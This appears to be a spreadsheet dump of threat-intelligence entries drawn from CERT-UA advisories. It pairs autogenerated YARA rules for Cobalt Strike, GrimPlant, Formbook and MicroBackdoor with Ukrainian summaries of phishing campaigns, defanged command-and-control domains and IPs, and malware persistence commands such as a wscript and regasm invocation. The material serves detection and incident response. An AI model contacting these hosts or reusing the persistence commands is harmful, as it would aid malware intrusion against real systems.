        $sequence_7 = { 898424e8000000 85c0 0f8534010000 488b0b 448b7914 4585ff 0f89b4feffff }
            // n = 7, score = 100
            //   898424e8000000       | jne                 0x4d
            //   85c0                 | dec                 eax
            //   0f8534010000         | lea                 edx, dword ptr [esp + 0xd0]
            //   488b0b               | mov                 ecx, 4
            //   448b7914             | jne                 0x65
            //   4585ff               | inc                 esp
            //   0f89b4feffff         | movzx               eax, byte ptr [ecx + 1]
        $sequence_8 = { eb2d 4889c8 4889fb 4889d1 e8???????? 83f001 488b4c2450 }
            // n = 7, score = 100
            //   eb2d                 | dec                 eax
            //   4889c8               | stosd               dword ptr es:[edi], eax
            //   4889fb               | dec                 eax
            //   4889d1               | mov                 dword ptr [esp + 0x30], 0
            //   e8????????           |                     
            //   83f001               | dec                 eax
            //   488b4c2450           | mov                 dword ptr [esp + 0x38], 0
        $sequence_9 = { b981000000 e8???????? 488d05673d5c00 bb1e000000 e8???????? 90 4889442408 }
            // n = 7, score = 100
            //   b981000000           | cmp                 ecx, edx
            //   e8????????           |                     
            //   488d05673d5c00       | je                  0xf8b
            //   bb1e000000           | dec                 eax
            //   e8????????           |                     
            //   90                   | lea                 edx, dword ptr [ecx + 1]
            //   4889442408           | cmp                 dl, 0x2e
    condition:
        7 of them and filesize &lt; 19812352
}
rule win_grimplant_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.grimplant."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant"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ffd1 488b4c2420 48f7c160000000 b900000000 ba20000000 480f45ca 4881c994000000 }
            // n = 7, score = 100
            //   ffd1                 | lea                 edi, dword ptr [eax + 0x18]
            //   488b4c2420           | dec                 eax
            //   48f7c160000000       | mov                 ecx, dword ptr [esp + 0x5b0]
            //   b900000000           | jne                 0xcd8
            //   ba20000000           | dec                 eax
            //   480f45ca             | mov                 ecx, dword ptr [esp + 0xb8]
            //   4881c994000000       | dec                 eax
        $sequence_1 = { eb1c 488b9424d8000000 488d4a01 488b8424c8000000 488b9c2418010000 48898c24d8000000 488b5028 }
            // n = 7, score = 100
            //   eb1c                 | mov                 ebx, 2
            //   488b9424d8000000     | mov                 ecx, 6
            //   488d4a01             | dec                 eax
            //   488b8424c8000000     | mov                 esi, dword ptr [esp + 0xa0]
            //   488b9c2418010000     | jge                 0xa0
            //   48898c24d8000000     | nop                 dword ptr [eax]
            //   488b5028             | dec                 eax
        $sequence_2 = { eb0e 488d3d22406e00 31c0 e8???????? 440f113d???????? 833d????????00 750d }
            // n = 7, score = 100
            //   eb0e                 | cmp                 byte ptr [eax], 0x31
            //   488d3d22406e00       | jne                 0x4d1
            //   31c0                 | jne                 0x1ad
            //   e8????????           |                     
            //   440f113d????????     |                     
            //   833d????????00       |                     
            //   750d                 | dec                 eax
        $sequence_3 = { 660f3a0fff08 66450f3a0fd20c 4c0317 4c135f08 4983d401 488b4500 4989c7 }
            // n = 7, score = 100
            //   660f3a0fff08         | mov                 dword ptr [esp + 0x18], edx
            //   66450f3a0fd20c       | dec                 eax
            //   4c0317               | lea                 edi, dword ptr [0x54a8d4]
            //   4c135f08             | nop                 dword ptr [eax]
            //   4983d401             | jmp                 0xa6b
            //   488b4500             | dec                 eax
            //   4989c7               | lea                 edx, dword ptr [0xb1972]
        $sequence_4 = { 4c8d4e01 6690 4c39cf 7334 488d05143c3300 4c89c3 4889f1 }
            // n = 7, score = 100
            //   4c8d4e01             | jne                 0x12ed
            //   6690                 | dec                 eax
            //   4c39cf               | mov                 ecx, dword ptr [esp + 0x28]
            //   7334                 | dec                 eax
            //   488d05143c3300       | mov                 eax, dword ptr [esp + 0x30]
            //   4c89c3               | dec                 eax
            //   4889f1               | lea                 ecx, dword ptr [0x45cfe0]
        $sequence_5 = { e9???????? 488d05bc6d1700 e8???????? 488d0db0022800 488908 833d????????00 750e }
            // n = 7, score = 100
            //   e9????????           |                     
            //   488d05bc6d1700       | dec                 eax
            //   e8????????           |                     
            //   488d0db0022800       | mov                 eax, ecx
            //   488908               | dec                 eax
            //   833d????????00       |                     
            //   750e                 | lea                 ecx, dword ptr [0x535463]
        $sequence_6 = { ffd6 488b4c2460 488b8980000000 488b442468 31db 31ff 4889ca }
            // n = 7, score = 100
            //   ffd6                 | dec                 eax
            //   488b4c2460           | mov                 dword ptr [eax + 0x30], edx
            //   488b8980000000       | jmp                 0x1241
            //   488b442468           | dec                 eax
            //   31db                 | lea                 edi, dword ptr [eax + 0x30]
            //   31ff                 | nop                 
            //   4889ca               | jne                 0x1245
        $sequence_7 = { e9???????? 4889c8 4889fb 4889d1 e8???????? 488b4c2478 4839cb }
            // n = 7, score = 100
            //   e9????????           |                     
            //   4889c8               | dec                 eax
            //   4889fb               | mov                 edi, dword ptr [esp + 0x18]
            //   4889d1               | dec                 eax
            //   e8????????           |                     
            //   488b4c2478           | cmp                 dword ptr [edx + 0x10], 0
            //   4839cb               | jne                 0x97d
        $sequence_8 = { eb0d 4889c7 488b4c2428 e8???????? 31c0 31db 488b6c2448 }
            // n = 7, score = 100
            //   eb0d                 | lea                 eax, dword ptr [0x1f4d97]
            //   4889c7               | dec                 eax
            //   488b4c2428           | mov                 dword ptr [eax + 8], 0x50
            //   e8????????           |                     
            //   31c0                 | jne                 0x33d
            //   31db                 | nop                 
            //   488b6c2448           | dec                 eax
        $sequence_9 = { e9???????? 4889d6 e8???????? 488b4c2458 4839c8 773e 488b742450 }
            // n = 7, score = 100
            //   e9????????           |                     
            //   4889d6               | dec                 eax
            //   e8????????           |                     
            //   488b4c2458           | mov                 ecx, dword ptr [esp + 0x20]
            //   4839c8               | dec                 eax
            //   773e                 | lea                 edi, dword ptr [ecx + 0x40]
            //   488b742450           | jne                 0xb6e
    condition:
        7 of them and filesize &lt; 19940352
}
rule win_cobalt_strike_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.cobalt_strike."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike"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e9???????? eb0a b801000000 e9???????? }
            // n = 4, score = 1800
            //   e9????????           |                     
            //   eb0a                 | jmp                 0xc
            //   b801000000           | mov                 eax, 1
            //   e9????????           |                     
        $sequence_1 = { 3bc7 750d ff15???????? 3d33270000 }
            // n = 4, score = 1800
            //   3bc7                 | cmp                 eax, edi
            //   750d                 | jne                 0xf
            //   ff15????????         |                     
            //   3d33270000           | cmp                 eax, 0x2733
        $sequence_2 = { ff7608 ff15???????? 8bf8 83c410 }
            // n = 4, score = 1100
            //   ff7608               | push                dword ptr [esi + 8]
            //   ff15????????         |                     
            //   8bf8                 | mov                 edi, eax
            //   83c410               | add                 esp, 0x10
        $sequence_3 = { ff7604 ff75fc ff15???????? 83c410 8bf8 }
            // n = 5, score = 1100
            //   ff7604               | push                dword ptr [esi + 4]
            //   ff75fc               | push                dword ptr [ebp - 4]
            //   ff15????????         |                     
            //   83c410               | add                 esp, 0x10
            //   8bf8                 | mov                 edi, eax
        $sequence_4 = { eb0d 6802010000 ff15???????? 33c0 }
            // n = 4, score = 1100
            //   eb0d                 | jmp                 0xf
            //   6802010000           | push                0x102
            //   ff15????????         |                     
            //   33c0                 | xor                 eax, eax
        $sequence_5 = { eb0b 8b45d4 83c010 8945d4 eb84 e9???????? 837d0c18 }
            // n = 7, score = 1100
            //   eb0b                 | jmp                 0xd
            //   8b45d4               | mov                 eax, dword ptr [ebp - 0x2c]
            //   83c010               | add                 eax, 0x10
            //   8945d4               | mov                 dword ptr [ebp - 0x2c], eax
            //   eb84                 | jmp                 0xffffff86
            //   e9????????           |                     
            //   837d0c18             | cmp                 dword ptr [ebp + 0xc], 0x18
        $sequence_6 = { ff760c 894518 ff15???????? 59 }
            // n = 4, score = 1100
            //   ff760c               | push                dword ptr [esi + 0xc]
            //   894518               | mov                 dword ptr [ebp + 0x18], eax
            //   ff15????????         |                     
            //   59                   | pop                 ecx
        $sequence_7 = { eb0c 890d???????? e8???????? 59 5f 5e 5d }
            // n = 7, score = 1100
            //   eb0c                 | jmp                 0xe
            //   890d????????         |                     
            //   e8????????           |                     
            //   59                   | pop                 ecx
            //   5f                   | pop                 edi
            //   5e                   | pop                 esi
            //   5d                   | pop                 ebp
        $sequence_8 = { e8???????? e9???????? 833d????????01 7505 }
            // n = 4, score = 1000
            //   e8????????           |                     
            //   e9????????           |                     
            //   833d????????01       |                     
            //   7505                 | jne                 7
        $sequence_9 = { 8bd0 e8???????? 85c0 7e0e }
            // n = 4, score = 1000
            //   8bd0                 | mov                 edx, eax
            //   e8????????           |                     
            //   85c0                 | test                eax, eax
            //   7e0e                 | jle                 0x10
        $sequence_10 = { 85c0 741d ff15???????? 85c0 7513 }
            // n = 5, score = 900
            //   85c0                 | test                eax, eax
            //   741d                 | je                  0x1f
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   7513                 | jne                 0x15
        $sequence_11 = { 85c0 7405 e8???????? 8b0d???????? 85c9 }
            // n = 5, score = 800
            //   85c0                 | test                eax, eax
            //   7405                 | je                  7
            //   e8????????           |                     
            //   8b0d????????         |                     
            //   85c9                 | test                ecx, ecx
        $sequence_12 = { e8???????? 488b15???????? 4983c8ff 49ffc0 }
            // n = 4, score = 700
            //   e8????????           |                     
            //   488b15????????       |                     
            //   4983c8ff             | dec                 ecx
            //   49ffc0               | or                  eax, 0xffffffff
        $sequence_13 = { e8???????? 488b15???????? 6689441708 488d4c2420 }
            // n = 4, score = 700
            //   e8????????           |                     
            //   488b15????????       |                     
            //   6689441708           | inc                 edx
            //   488d4c2420           | cmp                 byte ptr [edx + eax], 0
        $sequence_14 = { 4883ec20 4c8bf1 8b0d???????? 418bf8 488bf2 }
            // n = 5, score = 700
            //   4883ec20             | lea                 ecx, dword ptr [esp + 0x20]
            //   4c8bf1               | dec                 esp
            //   8b0d????????         |                     
            //   418bf8               | mov                 eax, eax
            //   488bf2               | jmp                 0xc
        $sequence_15 = { 458d5a01 85db 7427 488d7dd0 418d4202 0fb60c30 }
            // n = 6, score = 700
            //   458d5a01             | mov                 eax, 1
            //   85db                 | cmp                 eax, edi
            //   7427                 | jne                 0x11
            //   488d7dd0             | cmp                 eax, 0x2733
            //   418d4202             | je                  0x1f
            //   0fb60c30             | test                eax, eax
    condition:
        7 of them and filesize &lt; 696320
}
rule win_cobalt_strike_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.cobalt_strike."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike"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e9???????? eb0a b801000000 e9???????? }
            // n = 4, score = 1800
            //   e9????????           |                     
            //   eb0a                 | jmp                 0xc
            //   b801000000           | mov                 eax, 1
            //   e9????????           |                     
        $sequence_1 = { 3bc7 750d ff15???????? 3d33270000 }
            // n = 4, score = 1800
            //   3bc7                 | cmp                 eax, edi
            //   750d                 | jne                 0xf
            //   ff15????????         |                     
            //   3d33270000           | cmp                 eax, 0x2733
        $sequence_2 = { ff7608 ff15???????? 8bf8 83c410 }
            // n = 4, score = 1100
            //   ff7608               | push                dword ptr [esi + 8]
            //   ff15????????         |                     
            //   8bf8                 | mov                 edi, eax
            //   83c410               | add                 esp, 0x10
        $sequence_3 = { ff7604 ff75fc ff15???????? 83c410 8bf8 }
            // n = 5, score = 1100
            //   ff7604               | push                dword ptr [esi + 4]
            //   ff75fc               | push                dword ptr [ebp - 4]
            //   ff15????????         |                     
            //   83c410               | add                 esp, 0x10
            //   8bf8                 | mov                 edi, eax
        $sequence_4 = { eb0d 6802010000 ff15???????? 33c0 }
            // n = 4, score = 1100
            //   eb0d                 | jmp                 0xf
            //   6802010000           | push                0x102
            //   ff15????????         |                     
            //   33c0                 | xor                 eax, eax
        $sequence_5 = { eb0b 8b45d4 83c010 8945d4 eb84 e9???????? 837d0c18 }
            // n = 7, score = 1100
            //   eb0b                 | jmp                 0xd
            //   8b45d4               | mov                 eax, dword ptr [ebp - 0x2c]
            //   83c010               | add                 eax, 0x10
            //   8945d4               | mov                 dword ptr [ebp - 0x2c], eax
            //   eb84                 | jmp                 0xffffff86
            //   e9????????           |                     
            //   837d0c18             | cmp                 dword ptr [ebp + 0xc], 0x18
        $sequence_6 = { ff760c 894518 ff15???????? 59 }
            // n = 4, score = 1100
            //   ff760c               | push                dword ptr [esi + 0xc]
            //   894518               | mov                 dword ptr [ebp + 0x18], eax
            //   ff15????????         |                     
            //   59                   | pop                 ecx
        $sequence_7 = { eb0c 890d???????? e8???????? 59 5f 5e 5d }
            // n = 7, score = 1100
            //   eb0c                 | jmp                 0xe
            //   890d????????         |                     
            //   e8????????           |                     
            //   59                   | pop                 ecx
            //   5f                   | pop                 edi
            //   5e                   | pop                 esi
            //   5d                   | pop                 ebp
        $sequence_8 = { e8???????? e9???????? 833d????????01 7505 }
            // n = 4, score = 1000
            //   e8????????           |                     
            //   e9????????           |                     
            //   833d????????01       |                     
            //   7505                 | jne                 7
        $sequence_9 = { 8bd0 e8???????? 85c0 7e0e }
            // n = 4, score = 1000
            //   8bd0                 | mov                 edx, eax
            //   e8????????           |                     
            //   85c0                 | test                eax, eax
            //   7e0e                 | jle                 0x10
        $sequence_10 = { 85c0 741d ff15???????? 85c0 7513 }
            // n = 5, score = 900
            //   85c0                 | test                eax, eax
            //   741d                 | je                  0x1f
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   7513                 | jne                 0x15
        $sequence_11 = { 85c0 7405 e8???????? 8b0d???????? 85c9 }
            // n = 5, score = 800
            //   85c0                 | test                eax, eax
            //   7405                 | je                  7
            //   e8????????           |                     
            //   8b0d????????         |                     
            //   85c9                 | test                ecx, ecx
        $sequence_12 = { e8???????? 488b15???????? 4983c8ff 49ffc0 }
            // n = 4, score = 700
            //   e8????????           |                     
            //   488b15????????       |                     
            //   4983c8ff             | dec                 ecx
            //   49ffc0               | or                  eax, 0xffffffff
        $sequence_13 = { e8???????? 488b15???????? 6689441708 488d4c2420 }
            // n = 4, score = 700
            //   e8????????           |                     
            //   488b15????????       |                     
            //   6689441708           | inc                 edx
            //   488d4c2420           | cmp                 byte ptr [edx + eax], 0
        $sequence_14 = { 4883ec20 4c8bf1 8b0d???????? 418bf8 488bf2 }
            // n = 5, score = 700
            //   4883ec20             | lea                 ecx, dword ptr [esp + 0x20]
            //   4c8bf1               | dec                 esp
            //   8b0d????????         |                     
            //   418bf8               | mov                 eax, eax
            //   488bf2               | jmp                 0xc
        $sequence_15 = { 458d5a01 85db 7427 488d7dd0 418d4202 0fb60c30 }
            // n = 6, score = 700
            //   458d5a01             | mov                 eax, 1
            //   85db                 | cmp                 eax, edi
            //   7427                 | jne                 0x11
            //   488d7dd0             | cmp                 eax, 0x2733
            //   418d4202             | je                  0x1f
            //   0fb60c30             | test                eax, eax
    condition:
        7 of them and filesize &lt; 696320
}</t>
  </si>
  <si>
    <t>Від суб'єктів координації отримано повідомлення про масове розповсюдження електронних листів від імені державних органів України з інструкціями щодо підвищення рівня інформаційної безпеки. У тілі листа знаходиться посилання на веб-сайт hxxps://forkscenter[.]fr/, з якого пропонується завантажити "критичні оновлення" у вигляді файлу "BitdefenderWindowsUpdatePackage.exe" розміром близько 60МБ.
З'ясовано, що згаданий файл забезпечить виконання завантажувача "alt.exe", який здійснить завантаження файлів "one.exe" та "dropper.exe" з сервісу Discord та їхній запуск. В рамках дослідження визначено, що запуск "one.exe" призведе до ураження комп'ютера шкідливою програмою Cobalt Strike Beacon, а також завантаження і виконання файлу "wisw.exe", який, у свою чергу, мав би завантажити з Discord та виконати файл "cesdf.exe" (не доступний на момент аналізу).
Файл "dropper.exe" здійснить завантаження, base64-декодування, збереження на диск та виконання файлу "java-sdk.exe". Останній, окрім забезпечення персистентності через реєстр Windows, також здійснить завантаження, base64-декодуання, збереження на диск та виконання двох інших файлів: "microsoft-cortana.exe", що класифіковано як бекдор GraphSteel, та "oracle-java.exe", який класифіковано як бекдор GrimPlant.
Зауважимо, що EXE-файли (завантажувачі з Discord) захищено протектором Themida.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/37704</t>
  </si>
  <si>
    <t>CERT-UA#4125</t>
  </si>
  <si>
    <t>Постачання, Підтримка; ua</t>
  </si>
  <si>
    <t>Hidden macros, Formbook, XLoader v2.5</t>
  </si>
  <si>
    <t>mariya@posish[.]club
104[.]168.247.233
hxxp://103[.]167.92.57/xx_cloudprotect/vbc.exe
103[.]167.92.57
gobits3[.]com
(список хибних доменних імен)
humamzarodi[.]info
cillacollection[.]com
phy[.]wiki
londonkhaboos[.]com
robostetics[.]com
bryanheritagefarm[.]com
writingdadsobituary[.]com
uitzendstudent[.]online
kaeltefath[.]com
ooop63[.]website
oncasi-tengoku[.]com
weihiw[.]store
gameshill[.]net
clublebron[.]com
fromuktosa[.]com
hilversumrp[.]com
formigocerdanya[.]com
jokeaou[.]com
bvgsf[.]xyz
reallyreadyservices[.]com
zrbusiness[.]com
homephotomarketing[.]com
evpunk[.]com
hermanmitchels[.]com
globalprotectionllc[.]com
carlab[.]rentals
aocpaysage[.]com
g3kbwq[.]xyz
ojosnegroshacienda[.]com
greenvilletaxfirm[.]com
circuitoristorazione[.]com
chicklet[.]biz
allegiancebookkeeper[.]com
xyyvivo[.]com
cassandracheatham[.]com
gobits3[.]com
upcxi[.]xyz
adjd[.]info
hdwix[.]online
sbxtv[.]info
abodhakujena[.]com
yhomggsmtdynchb[.]store
jeffreylau[.]xyz
lovelypersonal[.]com
lwmdqj[.]com
tapelm[.]com
ulasan-online[.]com
roleplayhr[.]com
avilarts[.]com
marygracerenella[.]com
yellowumbrellamarketing[.]com
ilyapershin[.]com
bellkennedy[.]online
muhammadsaqib[.]tech
certuslogistics[.]com
unforgettableamour[.]com
jtelp[.]com
movinonuprva[.]com
xn--ltda-epa[.]com
knolmail[.]xyz
houstonorganicpestcontrol[.]com
befancie[.]com
typejitem[.]store
zqt2578[.]com
astrologyplatform[.]com</t>
  </si>
  <si>
    <t>%PUBLIC%\vbc.exe</t>
  </si>
  <si>
    <t>rule win_formbook_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.formbook."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook"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81ec08020000 56 8b7514 85f6 7507 33c0 5e }
            // n = 7, score = 2200
            //   81ec08020000         | sub                 esp, 0x208
            //   56                   | push                esi
            //   8b7514               | mov                 esi, dword ptr [ebp + 0x14]
            //   85f6                 | test                esi, esi
            //   7507                 | jne                 9
            //   33c0                 | xor                 eax, eax
            //   5e                   | pop                 esi
        $sequence_1 = { eb03 8b4df8 8b550c 8b0491 8b4df4 03c6 50 }
            // n = 7, score = 2200
            //   eb03                 | jmp                 5
            //   8b4df8               | mov                 ecx, dword ptr [ebp - 8]
            //   8b550c               | mov                 edx, dword ptr [ebp + 0xc]
            //   8b0491               | mov                 eax, dword ptr [ecx + edx*4]
            //   8b4df4               | mov                 ecx, dword ptr [ebp - 0xc]
            //   03c6                 | add                 eax, esi
            //   50                   | push                eax
        $sequence_2 = { 83c40c 85f6 7421 8d85f0fdffff 50 e8???????? 8d4c0002 }
            // n = 7, score = 2200
            //   83c40c               | add                 esp, 0xc
            //   85f6                 | test                esi, esi
            //   7421                 | je                  0x23
            //   8d85f0fdffff         | lea                 eax, dword ptr [ebp - 0x210]
            //   50                   | push                eax
            //   e8????????           |                     
            //   8d4c0002             | lea                 ecx, dword ptr [eax + eax + 2]
        $sequence_3 = { 0f84b9000000 33db 395f04 0f86ae000000 83c710 8da42400000000 }
            // n = 6, score = 2200
            //   0f84b9000000         | je                  0xbf
            //   33db                 | xor                 ebx, ebx
            //   395f04               | cmp                 dword ptr [edi + 4], ebx
            //   0f86ae000000         | jbe                 0xb4
            //   83c710               | add                 edi, 0x10
            //   8da42400000000       | lea                 esp, dword ptr [esp]
        $sequence_4 = { 6a00 e8???????? 8b4830 51 8d95fcfeffff 52 e8???????? }
            // n = 7, score = 2200
            //   6a00                 | push                0
            //   e8????????           |                     
            //   8b4830               | mov                 ecx, dword ptr [eax + 0x30]
            //   51                   | push                ecx
            //   8d95fcfeffff         | lea                 edx, dword ptr [ebp - 0x104]
            //   52                   | push                edx
            //   e8????????           |                     
        $sequence_5 = { c3 8b4514 83f832 7508 8b550c 8b420c eb0b }
            // n = 7, score = 2200
            //   c3                   | ret                 
            //   8b4514               | mov                 eax, dword ptr [ebp + 0x14]
            //   83f832               | cmp                 eax, 0x32
            //   7508                 | jne                 0xa
            //   8b550c               | mov                 edx, dword ptr [ebp + 0xc]
            //   8b420c               | mov                 eax, dword ptr [edx + 0xc]
            //   eb0b                 | jmp                 0xd
        $sequence_6 = { 50 e8???????? 83c404 8d8c4500fcffff 51 56 }
            // n = 6, score = 2200
            //   50                   | push                eax
            //   e8????????           |                     
            //   83c404               | add                 esp, 4
            //   8d8c4500fcffff       | lea                 ecx, dword ptr [ebp + eax*2 - 0x400]
            //   51                   | push                ecx
            //   56                   | push                esi
        $sequence_7 = { 8d8db4f9ffff 51 8d95bcfbffff 52 e8???????? 8d85bcfbffff 50 }
            // n = 7, score = 2200
            //   8d8db4f9ffff         | lea                 ecx, dword ptr [ebp - 0x64c]
            //   51                   | push                ecx
            //   8d95bcfbffff         | lea                 edx, dword ptr [ebp - 0x444]
            //   52                   | push                edx
            //   e8????????           |                     
            //   8d85bcfbffff         | lea                 eax, dword ptr [ebp - 0x444]
            //   50                   | push                eax
        $sequence_8 = { e8???????? 03c0 50 8d8df8fdffff 51 }
            // n = 5, score = 2200
            //   e8????????           |                     
            //   03c0                 | add                 eax, eax
            //   50                   | push                eax
            //   8d8df8fdffff         | lea                 ecx, dword ptr [ebp - 0x208]
            //   51                   | push                ecx
        $sequence_9 = { 8b06 8d55fc 52 6a08 50 56 c745f400040000 }
            // n = 7, score = 2200
            //   8b06                 | mov                 eax, dword ptr [esi]
            //   8d55fc               | lea                 edx, dword ptr [ebp - 4]
            //   52                   | push                edx
            //   6a08                 | push                8
            //   50                   | push                eax
            //   56                   | push                esi
            //   c745f400040000       | mov                 dword ptr [ebp - 0xc], 0x400
    condition:
        7 of them and filesize &lt; 371712
}</t>
  </si>
  <si>
    <t>Виявлено факт масового розповсюдження електронних поштових повідомлень з темою "лист схвалення касового забезпечення" серед державних організацій України. Вміст листа стосується тематики війни та надання фінансової допомоги (вірогідно, автоматично перекладений на українську мову).
Додатком до електронного листа є XLS-файл "лист підтримки.xlsx", відкриття якого призведе до активації макросу, що забезпечить завантаження і запуск шкідливої програми Formbook/XLoader v2.5 (очевидно, що вміст-приманка документу не релевантна для громадян України).
Згадана шкідлива програма здійснить викрадення автентифікацйних даних, збережених у програмах комп'ютера, та їхню подальшу відправку на сервер управління зловмисників.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/37688</t>
  </si>
  <si>
    <t>CVE-2017-11882</t>
  </si>
  <si>
    <t>CWE-119</t>
  </si>
  <si>
    <t>9,3</t>
  </si>
  <si>
    <t>CERT-UA#4109</t>
  </si>
  <si>
    <t>Довідка, Інструкція, Артилерійські, Обстріли; ua</t>
  </si>
  <si>
    <t>NTA-file, VBScript,.NET-load, MicroBackdoor</t>
  </si>
  <si>
    <t>zip, chm, htm, vbs, lnk, ini, dll</t>
  </si>
  <si>
    <t>Stolen personal data, Operations with the file system, RCE, Screenshot</t>
  </si>
  <si>
    <t>xbeta[.]online:8443
185[.]175.158.27</t>
  </si>
  <si>
    <t>%PUBLIC%\ignit.vbs
%PUBLIC%\Favorites\desktop.ini
%PUBLIC%\Libraries\core.dll
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Windows Prefetch.lNk
wscript.exe //B //E:vbs C:\Users\Public\Favorites\desktop.ini
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U C:\Users\Public\Libraries\core.dll</t>
  </si>
  <si>
    <t>rule win_microbackdoor_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.microbackdoor."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.microbackdoor"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b9???????? 8b5dfc b8???????? 53 0f44c1 50 68???????? }
            // n = 7, score = 100
            //   b9????????           |                     
            //   8b5dfc               | mov                 ebx, dword ptr [ebp - 4]
            //   b8????????           |                     
            //   53                   | push                ebx
            //   0f44c1               | cmove               eax, ecx
            //   50                   | push                eax
            //   68????????           |                     
        $sequence_1 = { 50 ff7508 7517 e8???????? 83c40c 85c0 }
            // n = 6, score = 100
            //   50                   | push                eax
            //   ff7508               | push                dword ptr [ebp + 8]
            //   7517                 | jne                 0x19
            //   e8????????           |                     
            //   83c40c               | add                 esp, 0xc
            //   85c0                 | test                eax, eax
        $sequence_2 = { 41b808000000 e8???????? 488b942498000000 488d0d705a0000 498bfc e8???????? 488b9c2498000000 }
            // n = 7, score = 100
            //   41b808000000         | ret                 
            //   e8????????           |                     
            //   488b942498000000     | inc                 eax
            //   488d0d705a0000       | push                ebx
            //   498bfc               | dec                 eax
            //   e8????????           |                     
            //   488b9c2498000000     | sub                 esp, 0x20
        $sequence_3 = { 7630 8b450c 8d7734 394604 751d 668b4514 663906 }
            // n = 7, score = 100
            //   7630                 | jbe                 0x32
            //   8b450c               | mov                 eax, dword ptr [ebp + 0xc]
            //   8d7734               | lea                 esi, dword ptr [edi + 0x34]
            //   394604               | cmp                 dword ptr [esi + 4], eax
            //   751d                 | jne                 0x1f
            //   668b4514             | mov                 ax, word ptr [ebp + 0x14]
            //   663906               | cmp                 word ptr [esi], ax
        $sequence_4 = { 8a450c 380433 7501 47 56 }
            // n = 5, score = 100
            //   8a450c               | mov                 al, byte ptr [ebp + 0xc]
            //   380433               | cmp                 byte ptr [ebx + esi], al
            //   7501                 | jne                 3
            //   47                   | inc                 edi
            //   56                   | push                esi
        $sequence_5 = { 8d4508 50 8b460c 83c038 50 6801000100 ff75fc }
            // n = 7, score = 100
            //   8d4508               | lea                 eax, dword ptr [ebp + 8]
            //   50                   | push                eax
            //   8b460c               | mov                 eax, dword ptr [esi + 0xc]
            //   83c038               | add                 eax, 0x38
            //   50                   | push                eax
            //   6801000100           | push                0x10001
            //   ff75fc               | push                dword ptr [ebp - 4]
        $sequence_6 = { 8b05???????? 488d542430 8901 0fb705???????? 66894104 }
            // n = 5, score = 100
            //   8b05????????         |                     
            //   488d542430           | dec                 eax
            //   8901                 | lea                 ecx, dword ptr [0x5a70]
            //   0fb705????????       |                     
            //   66894104             | dec                 ecx
        $sequence_7 = { 48897c2440 448bd5 488bf9 4883caff 660f1f440000 }
            // n = 5, score = 100
            //   48897c2440           | mov                 edi, esp
            //   448bd5               | dec                 eax
            //   488bf9               | mov                 ebx, dword ptr [esp + 0x98]
            //   4883caff             | jle                 0x37
            //   660f1f440000         | nop                 dword ptr [eax]
        $sequence_8 = { 488bf1 488d0ddf410000 e8???????? ff15???????? 488d1555620000 488d0dfe410000 }
            // n = 6, score = 100
            //   488bf1               | lea                 ecx, dword ptr [ebp - 0x70]
            //   488d0ddf410000       | mov                 eax, dword ptr [ebp - 0x70]
            //   e8????????           |                     
            //   ff15????????         |                     
            //   488d1555620000       | dec                 eax
            //   488d0dfe410000       | mov                 esi, ecx
        $sequence_9 = { c3 4053 4883ec20 488bd9 4885c9 0f84b4000000 }
            // n = 6, score = 100
            //   c3                   | dec                 eax
            //   4053                 | lea                 ecx, dword ptr [0x41df]
            //   4883ec20             | dec                 eax
            //   488bd9               | lea                 edx, dword ptr [0x6255]
            //   4885c9               | dec                 eax
            //   0f84b4000000         | lea                 ecx, dword ptr [0x41fe]
        $sequence_10 = { 85c0 0f84dbfdffff eb44 ff15???????? 488d0d6c460000 eb29 488d0da3460000 }
            // n = 7, score = 100
            //   85c0                 | inc                 esp
            //   0f84dbfdffff         | mov                 eax, edi
            //   eb44                 | dec                 eax
            //   ff15????????         |                     
            //   488d0d6c460000       | arpl                bx, ax
            //   eb29                 | dec                 eax
            //   488d0da3460000       | lea                 ecx, dword ptr [0x7e0a]
        $sequence_11 = { ff15???????? a1???????? 33f6 8b1d???????? 85c0 7409 }
            // n = 6, score = 100
            //   ff15????????         |                     
            //   a1????????           |                     
            //   33f6                 | xor                 esi, esi
            //   8b1d????????         |                     
            //   85c0                 | test                eax, eax
            //   7409                 | je                  0xb
        $sequence_12 = { 440fb7ea e8???????? 488d4d90 e8???????? 8b4590 }
            // n = 5, score = 100
            //   440fb7ea             | inc                 esp
            //   e8????????           |                     
            //   488d4d90             | movzx               ebp, dx
            //   e8????????           |                     
            //   8b4590               | dec                 eax
        $sequence_13 = { 7706 837de000 766b 8b7df0 8b75ec }
            // n = 5, score = 100
            //   7706                 | ja                  8
            //   837de000             | cmp                 dword ptr [ebp - 0x20], 0
            //   766b                 | jbe                 0x6d
            //   8b7df0               | mov                 edi, dword ptr [ebp - 0x10]
